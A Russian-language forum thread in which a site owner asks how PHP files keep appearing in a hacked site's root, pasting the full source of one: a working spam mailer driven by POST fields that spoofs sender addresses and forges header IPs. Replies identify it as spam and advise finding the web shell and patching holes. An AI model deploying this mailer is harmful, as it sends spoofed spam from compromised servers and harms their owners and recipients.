0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 1080 Просмотров
*

Mangoz

  • Новичок
  • 12
  • 0 / 0
Помогите найти очаг вируса. Не могу найти, что генерирует эти файлы в корень сайта. Каким-то образом при переходе по ссылкам сайта меня кидает на сайты буржуйских социалок или фармы. Файлы появляются стабильно 3-4 раза за сутки, после того как их удалишь.



Код одного из файла

Код
<?php

function getDomainFromEmail($email)
{
$domain = substr(strrchr($email, "@"), 1);
return $domain;
}

function random_string($length) {
    $key = '';
    $keys = range('a', 'z');

    for ($i = 0; $i < $length; $i++) {
        $key .= $keys[array_rand($keys)];
    }

    return $key . '.php';
}

if(isset($_POST["to_address"]))
        $to = $_POST["to_address"];
else
{
echo "404 error";
exit;
}

$subject = stripslashes($_POST["subject"]);
$message = stripslashes($_POST["body"]);

set_time_limit (60);
@ignore_user_abort (true);

$to_ar = explode(',', $to);




if(isset($_POST["from_address"]))
{

$from_address = stripslashes($_POST["from_address"]);
$from_name = stripslashes($_POST["from_name"]);

if(isset($_POST["use_local_domain"]))
{
         $l_domain = gethostname();
         
         $splitPos = strpos($l_domain, "www.");
         if ($splitPos !== false) {
         $l_domain = str_replace('www.', '', $l_domain);
          }

         $from_address = substr($from_address,  0, strpos($from_address, '@')). '@' . $l_domain;
}


//$header =  "MIME-Version: 1.0\r\n";
//$header .= "Content-type: text/plain; charset=iso-8859-1\r\n";
//$header .= 'From: ' . '"' . $from_name . '"' .  " <" . $from_address . ">\r\n";
//$header .= "Reply-To: $from_address\r\n";
//$header .= "Return-Path: $from_address\r\n";
//$header .= "X-Mailer: PHP/" . phpversion(). "\r\n" ;

$domain = getDomainFromEmail($email);
$randIP = "".mt_rand(0,255).".".mt_rand(0,255).".".mt_rand(0,255).".".mt_rand(0,255);

$from_format = $from_name." <".$from_address.">";

 $header = "Message-Id: <".md5(uniqid(rand())).".".preg_replace("/[^a-z0-9]/i", "", $from_format)."@{$domain}>\r\n";
 $header.= "From: {$from_format}\r\n";
 $header.= "To: {$to}\r\n";
 $header .= "Reply-To: $from_address\r\n";
 $header .= "Return-Path: $from_address\r\n";
// $header.= "Subject: {$subject}\r\n";
 $header.= "Date: ".date("r")."\r\n";
 $header.= "Content-Type: text/plain; charset=iso-8859-1\r\n";
 $header.= "X-Priority: 3\r\n";
 $header.= "X-MSMail-Priority: Normal\r\n";
 $header.= "X-Mailer: PHP - " .phpversion()."\r\n";
 $header.= "X-PHP-Script: ". rand(0,500).":". random_string(rand(3,13)). " for " . $randIP ."\r\n";
// $header.= "\r\n";
// $header.= $message;
// $header.= "\r\n.\r\n";




$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message), stripslashes($header));
}
else
{
$result = mail(stripslashes($to), stripslashes($subject), stripslashes($message));
}

if($result){echo 'good';}else{echo 'error : '.$result;}
 
?>
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
Re: Генерация php файлов в корень сайта
« Ответ #1 : 02.10.2014, 11:00:49 »
ищите и удаляйте shell, закрывайте уязвимости сайта, это не генерирует а подгружают
*

wishlight

  • Живу я здесь
  • 4340
  • 258 / 1
  • 300 руб очень быстрый хостинг в ЕС
*

robert

  • Живу я здесь
  • 4649
  • 429 / 16
Re: Генерация php файлов в корень сайта
« Ответ #3 : 02.10.2014, 11:14:35 »
Приведенный вами код рассылает спам от вашего имени.
Не будь паразитом, сделай что-нибудь самостоятельно!
*

Mangoz

  • Новичок
  • 12
  • 0 / 0
Re: Генерация php файлов в корень сайта
« Ответ #4 : 02.10.2014, 11:54:45 »
В каких файлах может находиться уязвимость?
*

wishlight

  • Живу я здесь
  • 4340
  • 258 / 1
  • 300 руб очень быстрый хостинг в ЕС
Re: Генерация php файлов в корень сайта
« Ответ #5 : 02.10.2014, 14:03:57 »
В общем в самых разнообразных вкратце. Мы же не знаем, что у вас установлено и сколько сайтов на аккаунте.
*

flyingspook

  • Живу я здесь
  • 3588
  • 247 / 9
*

Taatshi

  • Глобальный модератор
  • 4992
  • 466 / 1
  • Верстаем и немножко кодим. Обращайтесь ;)
Re: Генерация php файлов в корень сайта
« Ответ #7 : 03.10.2014, 08:23:43 »
Mangoz, если Вы не знакомы хотя бы с основами php - Вам самому это дело не осилить. У меня порой занимает пару-тройку дней чтобы найти уязвимость, полностью очистить сайт и поставить хотя бы базовую защиту.

Но можете попробовать. Воспользуйтесь скриптом айболит - на сегодняшний день это один из  самых эффективных инструментов для работы.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

как восстановить статьи после установки нового сайта на ту же БД

Автор midlex

Ответов: 26
Просмотров: 4731
Последний ответ 23.10.2017, 08:21:19
от kungurskiy
Чем лучше всего делать резервные копии сайта?

Автор 7Azimuth

Ответов: 113
Просмотров: 44123
Последний ответ 21.08.2017, 09:18:05
от dmitry_stas
Переустановка сайта

Автор wectra

Ответов: 13
Просмотров: 718
Последний ответ 02.07.2017, 19:09:39
от wectra
Flow player вставка файлов.

Автор ksv

Ответов: 3
Просмотров: 1847
Последний ответ 16.06.2017, 21:29:30
от altvvc
Не открываются некоторые страницы сайта

Автор nadin

Ответов: 5
Просмотров: 696
Последний ответ 12.04.2017, 18:34:22
от SeBun